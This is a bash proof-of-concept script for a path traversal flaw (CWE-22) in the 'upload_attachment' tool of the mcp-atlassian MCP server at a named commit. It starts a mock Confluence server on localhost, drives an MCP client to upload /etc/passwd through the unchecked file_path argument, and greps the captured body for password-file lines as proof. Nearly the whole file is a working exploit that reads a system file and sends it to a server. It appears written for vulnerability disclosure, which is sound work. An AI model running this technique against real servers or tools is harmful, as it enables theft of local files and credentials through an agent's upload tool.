#!/usr/bin/env bash
# PoC run 1 — leak /etc/passwd via upload_attachment path traversal
# Vulnerable: sooperset/mcp-atlassian HEAD d8bc786
# CWE-22 — no validate_safe_path() on upload_attachment tool's file_path arg
set -u
cd "$(dirname "$0")"

VENV=/tmp/mcp-atlassian-venv
PORT=18765
CAPTURE=/tmp/captured_body_run1.bin
rm -f "$CAPTURE"

# 1. Start mock Confluence
CAPTURE_PATH=$CAPTURE "$VENV/bin/python" ./mock_confluence.py $PORT >mock_run1.log 2>&1 &
MOCK_PID=$!
trap "kill $MOCK_PID 2>/dev/null" EXIT
sleep 1

# 2. Fire MCP client → triggers upload_attachment with /etc/passwd
"$VENV/bin/python" ./mcp_client.py /etc/passwd "http://127.0.0.1:$PORT/wiki" "$VENV/bin/mcp-atlassian"
RC=$?

# 3. Give mock a moment to flush
sleep 1
kill $MOCK_PID 2>/dev/null
wait $MOCK_PID 2>/dev/null

# 4. Proof: grep /etc/passwd contents out of captured multipart body
echo "---- CAPTURED BODY (first 800 bytes) ----"
head -c 800 "$CAPTURE" | cat -v
echo
echo "---- /etc/passwd MARKER HUNT ----"
if grep -aq "root:x:0:0" "$CAPTURE"; then
    echo "PROOF: /etc/passwd bytes present in multipart body captured by mock Confluence"
    grep -ao "root:x:0:0[^\"]*" "$CAPTURE" | head -3
    exit 0
else
    echo "FAILED: no /etc/passwd bytes in captured body"
    exit 1
fi